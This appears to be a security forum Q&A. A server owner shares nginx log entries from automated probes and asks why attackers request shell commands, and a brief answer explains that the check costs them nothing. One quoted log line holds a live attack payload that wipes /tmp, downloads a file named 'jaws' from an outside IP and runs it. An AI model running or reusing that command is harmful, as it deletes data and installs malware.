Why request shell commands from nginx?

Question

I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs:

170.81.46.70 - -  "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.14.224.220/jaws;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world"
93.157.62.102 - -  "GET / HTTP/1.1" 301 169 "http://[IP OF MY SERVER]:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
218.161.62.117 - -  "GET / HTTP/1.1" 400 157 "-" "-"
61.96.64.130 - -  "GET / HTTP/1.1" 400 157 "-" "-"

The IPs are, needless to say, not expected for this server.

I assume these are automated hack attempts. But what is the logic of requesting shell commands from nginx? Is it common for nginx to allow access to a shell? Is it possible to tell what specific exploit was attacked from these entries?

schroeder · Answer 1 · 2020-07-09T09:15:19.800

2

Is it common for nginx to allow access to a shell?

No.

Is it common for people to create/configure websites that allow access to the shell?

Kind of. Unfortunately.

Does it cost nothing to check?

Yes.

edited Jul 09 '20 at 09:15

answered Jul 09 '20 at 07:22

schroeder

123,438
55
284
319

Why request shell commands from nginx?

1 Answers1